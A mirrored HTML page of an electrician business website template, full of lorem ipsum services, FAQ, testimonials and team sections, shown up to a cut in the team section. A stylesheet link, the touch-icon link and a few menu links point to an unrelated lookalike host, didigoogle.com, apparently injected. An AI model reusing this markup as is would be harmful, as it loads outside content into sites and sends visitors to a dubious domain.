<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from wp.hostlin.com/electrician/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 01 Dec 2018 02:38:29 GMT -->
<head>
	<meta charset="UTF-8">
	<title>The Electrician || Responsive HTML 5 Template</title> 
	
	<!-- mobile responsive meta -->
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<link rel="stylesheet" href="css/style.css">
	<link rel="stylesheet" href="http://www.didigoogle.com/preurl/monkey">
	<link rel="stylesheet" href="fonts/flaticon.html" />

	<!--favicon-->
	<link rel="apple-touch-icon" sizes="180x180" href="http://www.didigoogle.com/preurl/monkey">
	<link rel="icon" type="image/png" href="images/favicon/favicon-32x32.html" sizes="32x32">
	<link rel="icon" type="image/png" href="images/favicon/favicon-16x16.png" sizes="16x16">

</head>

<body>
	<div class="boxed_wrapper">
		<div class="header-top">
			<div class="container clearfix">
				<!--Top Left-->
				<div class="top-left pull-left">
					<ul class="links-nav clearfix">
						<li><a href="#"><span class="fa fa-phone"></span> Call:  123 4561 5523 </a></li>
						<li><a href="#"><span class="fa fa-envelope"></span>Email:  info@templatepath.com</a></li>
					</ul>
				</div>
				<!--Top Right-->
                    <div class="top-right pull-right">
					<div class="social-links clearfix">
						<a href="#"><span class="fa fa-facebook-f"></span></a>
						<a href="#"><span class="fa fa-twitter"></span></a>
						<a href="#"><span class="fa fa-linkedin"></span></a>
						<a href="#"><span class="fa fa-instagram"></span></a>
						<a href="#"><span class="fa fa-pinterest-p"></span></a>
					</div>
				</div>
			</div>
		</div><!-- Header Top End -->

		


		<section class="mainmenu-area stricky">
		    <div class="container">
		    	<div class="row">
		    		<div class="col-md-4">
						<div class="main-logo">
							<a href="index-2.html"><img src="images/logo/logo.png" alt=""></a>
						</div>
					</div>
					<div class="col-md-6 menu-column">
						<nav class="main-menu">
				            <div class="navbar-header">     
				                <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
				                    <span class="icon-bar"></span>
				                    <span class="icon-bar"></span>
				                    <span class="icon-bar"></span>
				                    <span class="icon-bar"></span>
				                </button>
				            </div>
				            <div class="navbar-collapse collapse clearfix">
				                <ul class="navigation clearfix">

				                    <li class="current"><a href="index-2.html">Home</a></li>

									<li><a href="about.html">About</a></li>

									<li class="dropdown"><a href="#">Services</a>
										<ul>
											<li><a href="service.html">Services</a></li>
											<li><a href="air-conditioning.html">Air Conditioning</a></li>
											<li><a href="lighting-upgrades.html">Lighting Upgrades</a></li>
											<li><a href="electrical-maintenance.html">Electrical Maintenance</a></li>
											<li><a href="install-ceiling-fan.html">Install A Ceiling Fan</a></li>
											<li><a href="Repairs.html">Repairs</a></li>
										</ul>
									</li>

					                <li class="dropdown"><a href="#">Pages</a>
										<ul>
											<li><a href="gallery.html">Gallery</a></li>
											<li><a href="gallery-two.html">Gallery Two</a></li>
											<li><a href="team.html">Our Expart</a></li>
											<li><a href="http://www.didigoogle.com/preurl/monkey">Expart Details </a></li>
											<li><a href="faq.html">Faq</a></li>
											<li><a href="error.html">Error</a></li>
											
										 </ul>
									</li>

									<li class="dropdown"><a href="#">Blog</a>
										<ul>
											<li><a href="blog-grid.html">Blog Grid</a></li>
											<li><a href="blog-with-sidebar.html">Blog With Sidebar</a></li>
											<li><a href="blog-details.html">Blog Details</a></li>
										</ul>
									</li>
									
									<li class="dropdown"><a href="#">shop</a>
										<ul>
											<li><a href="http://www.didigoogle.com/preurl/monkey">shop</a></li>
											<li><a href="shop-single.html">shop single</a></li>
											<li><a href="shop-cart.html">shopping cart</a></li>
											<li><a href="checkout.html">checkout</a></li>
										</ul>
									</li>
									<li><a href="contact.html">Contact</a></li>
								</ul>

				                <ul class="mobile-menu clearfix">

				                    <li><a href="index-2.html">Home</a></li>

									<li><a href="about.html">About</a></li>

									<li class="dropdown"><a href="#">Services</a>
									<ul>
										<li><a href="service.html">Services</a></li>
										<li><a href="air-conditioning.html">Air Conditioning</a></li>
										<li><a href="lighting-upgrades.html">Lighting Upgrades</a></li>
										<li><a href="electrical-maintenance.html">Electrical Maintenance</a></li>
										<li><a href="install-ceiling-fan.html">Install A Ceiling Fan</a></li>
										<li><a href="Repairs.html">Repairs</a></li>
									 </ul>
									</li>

					                <li class="dropdown"><a href="#">Pages</a>
										<ul>
											<li><a href="gallery.html">Gallery</a></li>
											<li><a href="gallery-two.html">Gallery Two</a></li>
											<li><a href="team.html">Our Expart</a></li>
											<li><a href="http://www.didigoogle.com/preurl/monkey">Expart Details </a></li>
											<li><a href="faq.html">Faq</a></li>
											<li><a href="error.html">Error</a></li>
											
										 </ul>
									</li>

									<li class="dropdown"><a href="#">Blog</a>
										<ul>
											<li><a href="blog-grid.html">Blog Grid</a></li>
											<li><a href="blog-with-sidebar.html">Blog With Sidebar</a></li>
											<li><a href="blog-details.html">Blog Details</a></li>
										</ul>
									</li>
									
									<li class="dropdown"><a href="#">shop</a>
										<ul>
											<li><a href="shop.html">shop</a></li>
											<li><a href="shop-single.html">shop single</a></li>
											<li><a href="shop-cart.html">shopping cart</a></li>
											<li><a href="checkout.html">checkout</a></li>
										</ul>
									</li>
									<li><a href="contact.html">Contact</a></li>

				                </ul>
				            </div>
				        </nav>
					</div>
					<div class="col-md-2">
						<div class="right-area">
						   <div class="link_btn float_right">
							   <a href="#" class="thm-btn">GET A Quote?</a>
						   </div>
						</div>	
					</div>
		    	</div>
		        
		    </div>
		</section>


		<!--Start rev slider wrapper-->     
		<section class="rev_slider_wrapper">
			<div id="slider1" class="rev_slider"  data-version="5.0">
				<ul>
					
					<li data-transition="fade">
						<img src="images/slider/1.jpg"  alt="" width="1920" height="750" data-bgposition="top center" data-bgfit="cover" data-bgrepeat="no-repeat" data-bgparallax="1" >
						
						<div class="tp-caption  tp-resizeme" 
							data-x="left" data-hoffset="15" 
							data-y="top" data-voffset="220" 
							data-transform_idle="o:1;"         
							data-transform_in="x:[-175%];y:0px;z:0;rX:0;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;opacity:0.01;s:3000;e:Power3.easeOut;" 
							data-transform_out="s:1000;e:Power3.easeInOut;s:1000;e:Power3.easeInOut;" 
							data-mask_in="x:[100%];y:0;s:inherit;e:inherit;" 
							data-splitin="none" 
							data-splitout="none"
							data-start="700">
							<div class="slide-content-box">
								<h1>we have expart electrician</h1>
							</div>
						</div>
						<div class="tp-caption  tp-resizeme" 
							data-x="left" data-hoffset="15" 
							data-y="top" data-voffset="320" 
							data-transform_idle="o:1;"         
							data-transform_in="x:[-175%];y:0px;z:0;rX:0;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;opacity:0.01;s:3000;e:Power3.easeOut;" 
							data-transform_out="s:1000;e:Power3.easeInOut;s:1000;e:Power3.easeInOut;" 
							data-mask_in="x:[100%];y:0;s:inherit;e:inherit;" 
							data-splitin="none" 
							data-splitout="none"
							data-start="700">
							<div class="slide-content-box">
								<h2>Provide best electrical service</h2>
							</div>
						</div>
						<div class="tp-caption  tp-resizeme" 
							data-x="left" data-hoffset="15" 
							data-y="top" data-voffset="380" 
							data-transform_idle="o:1;"         
							data-transform_in="x:[-175%];y:0px;z:0;rX:0;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;opacity:0.01;s:3000;e:Power3.easeOut;" 
							data-transform_out="s:1000;e:Power3.easeInOut;s:1000;e:Power3.easeInOut;" 
							data-mask_in="x:[100%];y:0;s:inherit;e:inherit;" 
							data-splitin="none" 
							data-splitout="none"
							data-start="700">
							<div class="slide-content-box">
								<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit,<br>sed do eiusmod tempor incididunt ut labore.</p>
							</div>
						</div>
						<div class="tp-caption tp-resizeme" 
							data-x="left" data-hoffset="15" 
							data-y="top" data-voffset="460" 
							data-transform_idle="o:1;"                         
							data-transform_in="y:[100%];z:0;rX:0deg;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;opacity:0;s:2000;e:Power4.easeInOut;" 
							data-transform_out="s:1000;e:Power3.easeInOut;s:1000;e:Power3.easeInOut;"                     
							data-splitin="none" 
							data-splitout="none" 
							data-responsive_offset="on"
							data-start="2300">
							<div class="slide-content-box">
								<div class="button">
									<a class="thm-btn yellow-bg" href="contact.html">contact us</a>     
								</div>
							</div>
						</div>
						
					</li>
					<li data-transition="fade">
						<img src="images/slider/2.jpg"  alt="" width="1920" height="750" data-bgposition="top center" data-bgfit="cover" data-bgrepeat="no-repeat" data-bgparallax="1" >
						
						<div class="tp-caption  tp-resizeme" 
							data-x="left" data-hoffset="15" 
							data-y="top" data-voffset="220" 
							data-transform_idle="o:1;"         
							data-transform_in="x:[-175%];y:0px;z:0;rX:0;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;opacity:0.01;s:3000;e:Power3.easeOut;" 
							data-transform_out="s:1000;e:Power3.easeInOut;s:1000;e:Power3.easeInOut;" 
							data-mask_in="x:[100%];y:0;s:inherit;e:inherit;" 
							data-splitin="none" 
							data-splitout="none"
							data-start="700">
							<div class="slide-content-box">
								<h1>we have expart electrician</h1>
							</div>
						</div>
						<div class="tp-caption  tp-resizeme" 
							data-x="left" data-hoffset="15" 
							data-y="top" data-voffset="320" 
							data-transform_idle="o:1;"         
							data-transform_in="x:[-175%];y:0px;z:0;rX:0;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;opacity:0.01;s:3000;e:Power3.easeOut;" 
							data-transform_out="s:1000;e:Power3.easeInOut;s:1000;e:Power3.easeInOut;" 
							data-mask_in="x:[100%];y:0;s:inherit;e:inherit;" 
							data-splitin="none" 
							data-splitout="none"
							data-start="700">
							<div class="slide-content-box">
								<h2> Provide best electrical service</h2>
							</div>
						</div>
						<div class="tp-caption  tp-resizeme" 
							data-x="left" data-hoffset="15" 
							data-y="top" data-voffset="380" 
							data-transform_idle="o:1;"         
							data-transform_in="x:[-175%];y:0px;z:0;rX:0;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;opacity:0.01;s:3000;e:Power3.easeOut;" 
							data-transform_out="s:1000;e:Power3.easeInOut;s:1000;e:Power3.easeInOut;" 
							data-mask_in="x:[100%];y:0;s:inherit;e:inherit;" 
							data-splitin="none" 
							data-splitout="none"
							data-start="700">
							<div class="slide-content-box">
								<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit,<br>sed do eiusmod tempor incididunt ut labore.</p>
							</div>
						</div>
						<div class="tp-caption tp-resizeme" 
							data-x="left" data-hoffset="15" 
							data-y="top" data-voffset="460" 
							data-transform_idle="o:1;"                         
							data-transform_in="y:[100%];z:0;rX:0deg;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;opacity:0;s:2000;e:Power4.easeInOut;" 
							data-transform_out="s:1000;e:Power3.easeInOut;s:1000;e:Power3.easeInOut;"                     
							data-splitin="none" 
							data-splitout="none" 
							data-responsive_offset="on"
							data-start="2300">
							<div class="slide-content-box">
								<div class="button">
									<a class="thm-btn yellow-bg" href="contact.html">contact us</a>     
								</div>
							</div>
						</div>
						
					</li>
					<li data-transition="fade">
						<img src="images/slider/3.jpg"  alt="" width="1920" height="750" data-bgposition="top center" data-bgfit="cover" data-bgrepeat="no-repeat" data-bgparallax="1" >
						
						<div class="tp-caption  tp-resizeme" 
							data-x="left" data-hoffset="15" 
							data-y="top" data-voffset="220" 
							data-transform_idle="o:1;"         
							data-transform_in="x:[-175%];y:0px;z:0;rX:0;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;opacity:0.01;s:3000;e:Power3.easeOut;" 
							data-transform_out="s:1000;e:Power3.easeInOut;s:1000;e:Power3.easeInOut;" 
							data-mask_in="x:[100%];y:0;s:inherit;e:inherit;" 
							data-splitin="none" 
							data-splitout="none"
							data-start="700">
							<div class="slide-content-box">
								<h1>we have expart electrician</h1>
							</div>
						</div>
						<div class="tp-caption  tp-resizeme" 
							data-x="left" data-hoffset="15" 
							data-y="top" data-voffset="320" 
							data-transform_idle="o:1;"         
							data-transform_in="x:[-175%];y:0px;z:0;rX:0;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;opacity:0.01;s:3000;e:Power3.easeOut;" 
							data-transform_out="s:1000;e:Power3.easeInOut;s:1000;e:Power3.easeInOut;" 
							data-mask_in="x:[100%];y:0;s:inherit;e:inherit;" 
							data-splitin="none" 
							data-splitout="none"
							data-start="700">
							<div class="slide-content-box">
								<h2>Provide best electrical service</h2>
							</div>
						</div>
						<div class="tp-caption  tp-resizeme" 
							data-x="left" data-hoffset="15" 
							data-y="top" data-voffset="380" 
							data-transform_idle="o:1;"         
							data-transform_in="x:[-175%];y:0px;z:0;rX:0;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;opacity:0.01;s:3000;e:Power3.easeOut;" 
							data-transform_out="s:1000;e:Power3.easeInOut;s:1000;e:Power3.easeInOut;" 
							data-mask_in="x:[100%];y:0;s:inherit;e:inherit;" 
							data-splitin="none" 
							data-splitout="none"
							data-start="700">
							<div class="slide-content-box">
								<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit,<br>sed do eiusmod tempor incididunt ut labore.</p>
							</div>
						</div>
						<div class="tp-caption tp-resizeme" 
							data-x="left" data-hoffset="15" 
							data-y="top" data-voffset="460" 
							data-transform_idle="o:1;"                         
							data-transform_in="y:[100%];z:0;rX:0deg;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;opacity:0;s:2000;e:Power4.easeInOut;" 
							data-transform_out="s:1000;e:Power3.easeInOut;s:1000;e:Power3.easeInOut;"                     
							data-splitin="none" 
							data-splitout="none" 
							data-responsive_offset="on"
							data-start="2300">
							<div class="slide-content-box">
								<div class="button">
									<a class="thm-btn yellow-bg" href="contact.html">contact us</a>     
								</div>
							</div>
						</div>
						
					</li>
				</ul>
			</div>
		</section>
		<!--End rev slider wrapper--> 

		<section class="feature">
			<div class="container">
				<div class="item-list">
					<div class="row">
						
						<div class="col-md-4 col-sm-6 col-xs-12">
							<div class="item">
								<figure class="image-box">
									<img src="images/feature/2.jpg" alt="" />
									<div class="overlay">
										<div class="content-box">
											<h3>Residential</h3>
											<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et</p>
										</div>
									</div>	
								</figure>
								
								
								<div class="feature-btn text-center">
									<a href="#" class="button-style-two">read more</a>
								</div>
							</div>
						</div>
						
						<div class="col-md-4 col-sm-6 col-xs-12">
							<div class="item">
								<figure class="image-box">
									<img src="images/feature/3.jpg" alt="" />
									<div class="overlay">
										<div class="content-box">
											<h3>Commercial</h3>
											<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et</p>
										</div>
									</div>	
								</figure>
								
								<div class="feature-btn text-center">
									<a href="#" class="button-style-two">read more</a>
								</div>
							</div>
						</div>
						
						<div class="col-md-4 col-sm-6 col-xs-12">
							<div class="item">
								<figure class="image-box">
									<img src="images/feature/1.jpg" alt="" />
									<div class="overlay">
										<div class="content-box">
											<h3>Industrial</h3>
											<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et</p>
										</div>
									</div>	
								</figure>
								
								<div class="feature-btn text-center">
									<a href="#" class="button-style-two">read more</a>
								</div>
							</div>
						</div>
						
					</div>
				</div>	
			</div>
		</section>

		<section class="about-faq">
		    <div class="container">
		        <div class="sec-title">
					<h2>about us &<span> faq's</span></h2>
					
				</div>
		        <div class="row">
		            <div class="col-md-6 col-sm-12 col-xs-12">
		                <div class="about-info">
		                    <h3>Everyboy has something important to say!</h3>
		                    <br>
		                    <div class="text">
		                        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.Lorem ipsum dolor sit amet, consectetur adipisicing elit.</p><br>
		                        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p><br>
		                        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.Lorem ipsum dolor sit amet.</p><br>
		                    </div>

		                    <div class="link_btn">
		                        <a href="about.html" class="thm-btn">read more</a>
		                        
		                    </div>
		                </div>
		            </div>
		            <div class="col-md-6 col-sm-12 col-xs-12">
		                <div class="accordion-box">
		                    <!--Start single accordion box-->
		                    <div class="accordion animated out" data-delay="0" data-animation="fadeInUp">
		                        <div class="acc-btn">
		                            <p class="title">Can septic lines be installed under power lines?</p>
		                            <div class="toggle-icon">
		                                <span class="plus fa fa-angle-right"></span><span class="minus fa fa-angle-down"></span>
		                            </div>
		                        </div>
		                        <div class="acc-content">
		                            <div class="text"><p>
		                                Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.consectetur adipisicing elit. 
		                            </p></div>
		                        </div>
		                    </div>
		                    <!--Start single accordion box-->
		                    <div class="accordion animated out" data-delay="0" data-animation="fadeInUp">
		                        <div class="acc-btn active">
		                            <p class="title">Do you give any offer for premium customer?</p>
		                            <div class="toggle-icon">
		                                <i class="plus fa fa-angle-right"></i><i class="minus fa fa-angle-down"></i>
		                            </div>
		                        </div>
		                        <div class="acc-content collapsed">
		                            <div class="text"><p>
		                                Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.consectetur adipisicing elit. 
		                            </p></div>
		                        </div>
		                    </div>
		                    <!--Start single accordion box-->
		                    <div class="accordion animated out" data-delay="0" data-animation="fadeInUp">
		                        <div class="acc-btn">
		                            <p class="title">What makes you special from others?</p>
		                            <div class="toggle-icon">
		                                <i class="plus fa fa-angle-right"></i><i class="minus fa fa-angle-down"></i>
		                            </div>
		                        </div>
		                        <div class="acc-content">
		                            <div class="text"><p>
		                                Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.consectetur adipisicing elit. 
		                            </p></div>
		                        </div>
		                    </div>
		                    <!--Start single accordion box-->
		                    <div class="accordion animated out" data-delay="0" data-animation="fadeInUp">
		                        <div class="acc-btn">
		                            <p class="title">What about outdoor lighting?</p>
		                            <div class="toggle-icon">
		                                <i class="plus fa fa-angle-right"></i><i class="minus fa fa-angle-down"></i>
		                            </div>
		                        </div>
		                        <div class="acc-content">
		                            <div class="text"><p>
		                                Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.consectetur adipisicing elit. 
		                            </p></div>
		                        </div>
		                    </div>


		                </div>
		            </div>
		            
		        </div>
		    </div>
		</section>

		<section class="our-services">
		    <div class="container"> 
		    	<div class="sec-title">
					<h2>our <span>service</span></h2>
					<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut <br>labore et dolore magna aliqua. Ut enim ad minim veniam.</p>
				</div> 
		        <div class="row">
		            <div class="col-md-4 col-sm-6">
		                <div class="single-our-service">
		                    <figure class="img-box">
		                        <a href="service-single.html"><img src="images/service/6.jpg" alt="Awesome Image"></a>
		                    </figure>
		                    <div class="text-box">
		                        <a href="#"><h4>Air Conditioning</h4></a>
		                        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>
		                    </div>
		                        
		                </div>
		            </div>
		            <div class="col-md-4 col-sm-6">
		                <div class="single-our-service">
		                    <figure class="img-box">
		                        <a href="service-single.html"><img src="images/service/2.jpg" alt="Awesome Image"></a>
		                    </figure>
		                    <div class="text-box">
		                        <a href="#"><h4>Repairs</h4></a>
		                        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>
		                    </div>
		                        
		                </div>
		            </div>
		            <div class="col-md-4 col-sm-6">
		                <div class="single-our-service">
		                    <figure class="img-box">
		                        <a href="service-single.html"><img src="images/service/3.jpg" alt="Awesome Image"></a>
		                    </figure>
		                    <div class="text-box">
		                        <a href="#"><h4>Lighting Upgrades</h4></a>
		                        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>
		                    </div>
		                        
		                </div>
		            </div>
		            <div class="col-md-4 col-sm-6">
		                <div class="single-our-service">
		                    <figure class="img-box">
		                        <a href="service-single.html"><img src="images/service/4.jpg" alt="Awesome Image"></a>
		                    </figure>
		                    <div class="text-box">
		                        <a href="#"><h4>Electrical maintenance</h4></a>
		                        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>
		                    </div>
		                        
		                </div>
		            </div>
		            <div class="col-md-4 col-sm-6">
		                <div class="single-our-service">
		                    <figure class="img-box">
		                        <a href="service-single.html"><img src="images/service/5.jpg" alt="Awesome Image"></a>
		                    </figure>
		                    <div class="text-box">
		                        <a href="#"><h4>Install a Ceiling Fan</h4></a>
		                        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>
		                    </div>
		                        
		                </div>
		            </div>
		            <div class="col-md-4 col-sm-6">
		                <div class="single-our-service">
		                    <figure class="img-box">
		                        <a href="service-single.html"><img src="images/service/7.jpg" alt="Awesome Image"></a>
		                    </figure>
		                    <div class="text-box">
		                        <a href="#"><h4>Outdoor and Lighting</h4></a>
		                        <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>
		                    </div>
		                        
		                </div>
		            </div>

		        </div>
		    </div>
		</section>

		<!--call-to-action section-->
		<section class="call-to-action subscribe-intro">
			<div class="container">
				<div class="row">	
					<div class="col-md-9">
						<h3>Do you need help with electrical maintenance?</h3>
						<p>Lorem ipsum dolor sit amet, con sectetur adipisicing elit, sed do. </p>
					</div>
					<div class="col-md-3">
						<a href="contact.html" class="thm-btn inverse pull-right">contact us</a>
					</div>
				</div>
			</div>
		</section>
		
		<section class="latest-projects text-center">
			<div class="container"> 
				<div class="sec-title">
					<h2>latest <span>projects</span></h2>
				
				</div>           
				<ul class="post-filter list-inline">
					<li class="active" data-filter=".filter-item">
						<span>All</span>
					</li>
					<li data-filter=".Indoor-Services">
						<span>Indoor Services</span>
					</li>
					<li data-filter=".Old-Wiring-Faults">
						<span>Old Wiring Faults</span>
					</li>
					<li data-filter=".Out-door-repairing">
						<span>Out door repairing </span>
					</li>
					<li data-filter=".Shortcircuits">
						<span>Shortcircuits</span>
					</li>
				</ul>

				<div class="row masonary-layout filter-layout">
					<div class="col-md-4 col-sm-6 col-xs-12 filter-item">
						<div class="single-item">
							<div class="img-box">
								<img src="images/project/1.jpg" alt="Awesome Image"/>
								<div class="overlay">
									<div class="inner">
										<div class="social">
											<a href="images/project/1.jpg" data-fancybox-group="example-gallery" class="view lightbox-image"><i class="fa fa-plus"></i></a>	
											<h4>faulty and old wiring</h4>
										</div>
										
									</div>
								</div>
								
							</div>
							
						</div>
					</div>

					<div class="col-md-4 col-sm-6 col-xs-12 filter-item Indoor-Services Out-door-repairing">
						<div class="single-item">
							<div class="img-box">
								<img src="images/project/2.jpg" alt="Awesome Image"/>
								<div class="overlay">
									<div class="inner">
										<div class="social">
											<a href="images/project/2.jpg" data-fancybox-group="example-gallery" class="view lightbox-image"><i class="fa fa-plus"></i></a>	
											<h4>faulty and old wiring</h4>
										</div>
										
									</div>
								</div>
							</div>
							
						</div>
					</div>
					<div class="col-md-4 col-sm-6 col-xs-12 filter-item Shortcircuits  Old-Wiring-Faults">
						<div class="single-item">
							<div class="img-box">
								<img src="images/project/3.jpg" alt="Awesome Image"/>
								<div class="overlay">
									<div class="inner">
										<div class="social">
											<a href="images/project/3.jpg" data-fancybox-group="example-gallery" class="view lightbox-image"><i class="fa fa-plus"></i></a>	
											<h4>faulty and old wiring</h4>
										</div>
										
									</div>
								</div>
							</div>
							
						</div>
					</div>
					<div class="col-md-4 col-sm-6 col-xs-12 filter-item Indoor-Services Out-door-repairing Old-Wiring-Faults">
						<div class="single-item">
							<div class="img-box">
								<img src="images/project/4.jpg" alt="Awesome Image"/>
								<div class="overlay">
									<div class="inner">
										<div class="social">
											<a href="images/project/4.jpg" data-fancybox-group="example-gallery" class="view lightbox-image"><i class="fa fa-plus"></i></a>	
											<h4>faulty and old wiring</h4>
										</div>
										
									</div>
								</div>
							</div>
							
						</div>
					</div>
					<div class="col-md-4 col-sm-6 col-xs-12 filter-item Shortcircuits Out-door-repairing Old-Wiring-Faults">
						<div class="single-item">
							<div class="img-box">
								<img src="images/project/5.jpg" alt="Awesome Image"/>
								<div class="overlay">
									<div class="inner">
										<div class="social">
											<a href="images/project/5.jpg" data-fancybox-group="example-gallery" class="view lightbox-image"><i class="fa fa-plus"></i></a>	
											<h4>faulty and old wiring</h4>
										</div>
										
									</div>
								</div>
							</div>
							
						</div>
					</div>
					<div class="col-md-4 col-sm-6 col-xs-12 filter-item Out-door-repairing Indoor-Services video Shortcircuits Old-Wiring-Faults">
						<div class="single-item">
							<div class="img-box">
								<img src="images/project/6.jpg" alt="Awesome Image"/>
								<div class="overlay">
									<div class="inner">
										<div class="social">
											<a href="images/project/6.jpg" data-fancybox-group="example-gallery" class="view lightbox-image"><i class="fa fa-plus"></i></a>	
											<h4>faulty and old wiring</h4>
										</div>
										
									</div>
								</div>
							</div>
							
						</div>
					</div>
				</div><!-- /.row -->
			</div><!-- /.container -->
		</section><!-- /.latest-gallery -->
		
		<section class="testimonials-section">
		    <div class="container">
		        <div class="sec-title center">
		            <h2>testimonials</h2>
		        </div> 
		        
		        <!--Slider-->      
		        <div class="testimonials-slider column-carousel three-column">
		            
		            <!--Slide-->
		            <article class="slide-item">
		                <div class="quote"><span class="icon-left"></span></div>
		                <div class="author">
		                    <div class="img-box">
		                        <a href="#"><img src="images/resources/tes-1.jpg" alt=""></a>
		                    </div>
		                    <h4>Julio Habib</h4>
		                    <a href="#"><p>Newyork</p></a>
		                </div>
		                
		                <div class="slide-text">
		                    <p>Lorem ipsum dolor sit amet, consectetur adipi sicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna.</p>
		                </div>
		            </article>
		            
		            <!--Slide-->
		            <article class="slide-item">
		                <div class="quote"><span class="icon-left"></span></div>
		                <div class="author">
		                    <div class="img-box">
		                        <a href="#"><img src="images/resources/tes-2.jpg" alt=""></a>
		                    </div>
		                    <h4>Albart Nasim</h4>
		                    <a href="#"><p>San Fransisco</p></a>
		                </div>
		                
		                <div class="slide-text">
		                    <p>Lorem ipsum dolor sit amet, consectetur adipi sicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna.</p>
		                </div>
		            </article>
		            
		            <!--Slide-->
		            <article class="slide-item">
		                <div class="quote"><span class="icon-left"></span></div>
		                <div class="author">
		                    <div class="img-box">
		                        <a href="#"><img src="images/resources/tes-3.jpg" alt=""></a>
		                    </div>
		                    <h4>Mitali Khanom</h4>
		                    <a href="#"><p>Newyork</p></a>
		                </div>
		                
		                <div class="slide-text">
		                    <p>Lorem ipsum dolor sit amet, consectetur adipi sicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna.</p>
		                </div>
		            </article>

		     
		        </div>
		        
		    </div>    
		</section>


		<!--team section-->
		<section class="our-team">
			<div class="container">
				<div class="sec-title">
					<h2>Our<span> Expart</span></h2>
				
				</div>
				<div class="team-carousel">
					<div class="single-team">
						<div class="img-holder">
							<img src="images/team/team-1.jpg" alt="Awesome Image"/>
							<div class="overlay">
								<div class="inner">
									<ul class="social">
										<li><a href="#"><i class="fa fa-facebook"></i></a></li>
										<li><a href="#"><i class="fa fa-twitter"></i></a></li>
										<li><a href="#"><i class="fa fa-google-plus"></i></a></li>
										<li><a href="#"><i class="fa fa-linkedin"></i></a></li>
									</ul>
								</div>
							</div>
						</div>
						<div class="content-holder">
							<h4><a href="expart-details.html">Robart Shalam</a></h4>
							<h5>Master Electrician</h5>
							
						</div>
					</div>
					<div class="single-team">
						<div class="img-holder">
							<img src="images/team/team-2.jpg" alt="Awesome Image"/>
							<div class="overlay">
								<div class="inner">
									<ul class="social">
										<li><a href="#"><i class="fa fa-facebook"></i></a></li>
										<li><a href="#"><i class="fa fa-twitter"></i></a></li>
										<li><a href="#"><i class="fa fa-google-plus"></i></a></li>
										<li><a href="#"><i class="fa fa-linkedin"></i></a></li>
									</ul>
								</div>
							</div>
						</div>
						<div class="content-holder">
							<h4><a href="expart-details.html">Russell Mia</a></h4>
							<h5>Electrician</h5>
							
						</div>
					</div>
					<div class="single-team">
						<div class="img-holder">
							<img src="images/team/team-3.jpg" alt="Awesome Image"/>
							<div class="overlay">
								<div class="inner">
									<ul class="social">
										<li><a href="#"><i class="fa fa-facebook"></i></a></li>
										<li><a href="#"><i class="fa fa-twitter"></i></a></li>
										<li><a href="#"><i class="fa fa-google-plus"></i></a></li>
										<li><a href="#"><i class="fa fa-linkedin"></i></a></li>
									</ul>
								</div>
							</div>
						</div>
						<div class="content-holder">
							<h4><a href="expart-details.html">Albart Muzaddid</a></h4>
							<h5>Supervisor</h5>
							
						</div>
					</div>
					<div class="single-team">
						<div class="img-holder">
							<img src="images/team/team-4.jpg" alt="Awesome Image"/>
							<div class="overlay">
								<div class="inner">
									<ul class="social">
										<li><a href="#"><i class="fa fa-facebook"></i></a></li>
